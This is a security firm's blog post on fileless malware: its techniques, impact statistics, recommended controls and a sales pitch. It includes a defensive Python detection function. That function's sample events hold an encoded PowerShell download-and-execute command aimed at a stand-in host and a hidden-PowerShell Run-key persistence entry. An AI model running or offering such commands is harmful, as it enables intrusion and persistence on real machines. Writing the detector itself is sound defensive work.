
Top Security Threat – Fileless Malware

sujosutech

Updated: Jan 24

Fileless malware is a type of malicious software that operates directly in a computer’s memory rather than from the hard disk. It is termed “fileless” because, when a machine is infected, no malicious files are downloaded to the hard disk. It abuses legitimate programs already present on the computer to carry out the infection, often bypassing user and endpoint defenses.



Fileless malware can infect computers using various techniques:

  • It can use PowerShell to access the built-in Windows API functions that would normally be called from a malicious executable file.

  • A Microsoft Office document may include malicious macros that use PowerShell to execute commands. Such macros may be used to download and execute additional malware without writing it to the hard disk.

  • Attackers can exploit vulnerabilities within applications to execute malicious commands without writing anything to the hard disk.

  • Malware can write code into the memory space of an existing process and launch its malicious functionality from within that process.

  • Attackers can also manipulate the Windows registry, using a malicious link or file that takes advantage of a trusted Windows process. If a user clicks on that link, the Windows process writes the fileless malware into the registry and executes it from there.
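As an added illustration (not code from the original post), the following Python triage function flags process-creation events that match the techniques above: an Office application spawning PowerShell, hidden-window or -EncodedCommand invocations, a download-and-execute-in-memory idiom inside the decoded command, and a Run-key entry that launches PowerShell. The event field layout and the sample events are constructed for this example and do not follow any real Sysmon or EDR schema.

```python
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\b", re.IGNORECASE)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.IGNORECASE)
# Download-and-run-from-memory idiom: Invoke-Expression fed by a web download.
MEMORY_EXEC = re.compile(r"\b(?:iex|invoke-expression)\b.*\bdownload(?:string|data)\b", re.IGNORECASE)

def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmd: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if none."""
    m = ENCODED.search(cmd)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace") if m else ""
    except ValueError:  # malformed base64 still deserves a look, but must not crash triage
        return ""

def triage_event(event: dict) -> list[str]:
    """Return the reasons an event resembles fileless tradecraft (empty list if none)."""
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmd"]
    is_ps = image in {"powershell.exe", "pwsh.exe"}
    reasons = []
    if is_ps and parent in OFFICE_APPS:  # Office macro launching PowerShell
        reasons.append("office-app-spawned-powershell")
    if is_ps and HIDDEN.search(cmd):
        reasons.append("hidden-window")
    decoded = decode_encoded_command(cmd)
    if decoded:  # encoding hides the script from casual review
        reasons.append("encoded-command")
    if MEMORY_EXEC.search(cmd) or MEMORY_EXEC.search(decoded):
        reasons.append("download-and-execute-in-memory")
    if image == "reg.exe" and RUN_KEY.search(cmd) and "powershell" in cmd.lower():
        reasons.append("run-key-persistence-via-powershell")  # registry-resident launcher
    return reasons

# Constructed events; parent/image/cmd layout is assumed for this example and example.invalid never resolves.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -NoProfile -Command Get-Service"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmd": "powershell.exe -NoP -W Hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')")},
    {"parent": "cmd.exe", "image": "reg.exe",
     "cmd": r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d "powershell -w hidden"'},
]
```

Running triage_event over SAMPLE_EVENTS flags the Word-spawned encoded PowerShell and the Run-key write while leaving the plain administrative command alone.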

According to a report by the Ponemon Institute, fileless malware attacks are 10 times more likely to succeed than traditional file-based attacks. The 2023 Cloud Native Threat Report by Aqua Security stated that fileless attacks increased by more than 1400% compared with the previous year.


Impact

  • Organizations may suffer from downtime and loss of productivity.

  • Fileless malware can cause data breaches and theft of intellectual property. These can result in significant financial losses for the affected organization.

  • Fileless malware attacks may damage an organization’s brand image, leading to loss of customer base.

  • A breach of sensitive data may expose organizations to litigation.

 

Controls

  • Organizations should implement a comprehensive security policy.

  • Software should be procured / downloaded only from trusted sources.

  • The latest security patches and updates should be installed on all system and application software.

  • Anti-malware should be installed and updated at regular intervals.

  • Proper identity and access management must be implemented for critical resources. Access should only be granted on a need-to-know and need-to-use basis. Zero-trust security may be implemented.

  • Critical data and resources should be securely backed up at regular intervals.

  • Periodic security assessments and audits should be conducted to detect and remove vulnerabilities in systems.

  • Users should be provided with continuous training on how to identify and mitigate fileless malware.


How Sujosu Can Help

Sujosu Technology can help you identify areas of concern and assess your application and infrastructure security risk. Our consultants can suggest appropriate countermeasures and provide awareness / training to prevent, detect, identify, and recover from security attacks. Engage with us and remain cyber-secure.
